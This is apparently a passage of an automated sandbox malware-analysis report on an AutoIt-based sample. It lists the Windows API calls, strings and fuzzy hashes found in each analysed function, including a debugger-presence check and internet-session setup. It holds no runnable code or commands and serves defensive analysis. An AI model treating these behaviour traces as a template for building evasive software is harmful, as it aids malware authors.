                                            • Part of subcall function 00E4600E: CreateWindowExW.USER32 ref: 00E4604C
                                            • Part of subcall function 00E4600E: GetStockObject.GDI32 ref: 00E46060
                                            • Part of subcall function 00E4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4606A
                                          • GetWindowRect.USER32(00000000,?), ref: 00ED377A
                                          • GetSysColor.USER32 ref: 00ED3794
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 098288a9121bba36e2dc249e83ccfb15e470f3bda34828314007283d75e5178b
                                          • Instruction ID: c8cf64924c723a1720f81c760165d343c21dbfabb677c207a46dfe6e84a58cac
                                          • Opcode Fuzzy Hash: 098288a9121bba36e2dc249e83ccfb15e470f3bda34828314007283d75e5178b
                                          • Instruction Fuzzy Hash: 531156B261020AAFDF00DFB8DC46AEA7BF8FB08354F005926F955E2250E735E811DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EBCD7D
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EBCDA6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: f8b5c3d5059409741ae00ba3c945bf57dc49b9b63236e1aca839881d5b9bee53
                                          • Instruction ID: 4598f9587df83011c28640f385effd09bb292665bd3175198b70fd09f73ec428
                                          • Opcode Fuzzy Hash: f8b5c3d5059409741ae00ba3c945bf57dc49b9b63236e1aca839881d5b9bee53
                                          • Instruction Fuzzy Hash: 2A11C6792096327AD7344B668C45EE7BE6CEF527A8F60522AB149A3080D7709845D6F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetWindowTextLengthW.USER32 ref: 00ED34AB
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00ED34BA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 5f30f6050efc630e1cdc681154858fe26a1ffcbb6b964a13a26cfb9ed1d91c91
                                          • Instruction ID: b5d35a4dbbea7d50cf90bb37105df8ee202284ede228c9b4fb240279d340c708
                                          • Opcode Fuzzy Hash: 5f30f6050efc630e1cdc681154858fe26a1ffcbb6b964a13a26cfb9ed1d91c91
                                          • Instruction Fuzzy Hash: 19118F71100208AFEF214E74EC44AEB37AAEB05778F606326F971A32D0C779DC569752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • CharUpperBuffW.USER32(?,?), ref: 00EA6CB6
                                          • _wcslen.LIBCMT ref: 00EA6CC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: STOP
                                          • API String ID: 1256254125-2411985666
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: 3, 3, 16, 1
                                          • API String ID: 176396367-3042988571
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Message
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 2030045667-4017498283
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E5F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00E5F7CE
                                          • IsDebuggerPresent.KERNEL32 ref: 00E60D75
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule), ref: 00E60D84
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E60D7F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 55579361-631824599
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: %.3d$X64
                                          • API String ID: 481472006-1077770165
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • FindWindowW.USER32 ref: 00ED236C
                                          • PostMessageW.USER32 ref: 00ED2373
                                            • Part of subcall function 00EAE97B: Sleep.KERNEL32 ref: 00EAE9F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • FindWindowW.USER32 ref: 00ED232C
                                          • PostMessageW.USER32 ref: 00ED233F
                                            • Part of subcall function 00EAE97B: Sleep.KERNEL32 ref: 00EAE9F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          Uniqueness
                                          • Uniqueness Score: -1.00%